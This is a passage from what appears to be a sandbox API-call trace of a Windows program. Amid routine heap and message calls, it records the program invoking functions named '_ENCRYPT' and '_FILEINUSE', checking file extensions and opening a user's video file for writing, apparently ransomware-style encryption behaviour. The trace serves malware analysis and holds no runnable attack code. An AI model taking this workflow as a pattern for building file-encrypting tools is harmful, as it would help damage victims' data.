returned 1 [0194.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0194.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0194.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0194.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0194.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0194.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0194.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0194.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0194.612] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0194.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0194.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0194.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0194.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0194.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0194.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0194.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0194.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0194.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0194.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0194.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0194.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0194.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0194.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0194.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0194.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0194.613] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0194.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0194.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0194.613] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0194.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0194.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0194.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0194.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0194.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0194.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0194.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0194.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0194.613] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.614] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.614] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.614] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.614] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0194.614] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.614] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0194.614] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.614] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0194.614] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0194.615] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3660, lpOverlapped=0x0) returned 1 [0194.615] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0194.615] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3660, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.615] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0194.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0194.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0194.615] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0194.615] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0194.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0194.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0194.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0194.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0194.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0194.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0194.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0194.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0194.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0194.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0194.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0194.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0194.617] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0194.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0194.617] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0194.617] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0194.617] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0194.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0194.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0194.617] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0194.617] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0194.617] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.617] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\4us08vsplrh ofh79jeb.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0194.623] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0194.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0194.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0194.624] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0194.624] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0194.624] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0194.624] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.625] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0194.625] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0194.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0194.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0194.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0194.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0194.626] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0194.626] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0194.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0194.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0194.626] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.626] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0194.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0194.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0194.626] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0194.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0194.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0194.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0194.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0194.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0194.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0194.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0194.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0194.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0194.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0194.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 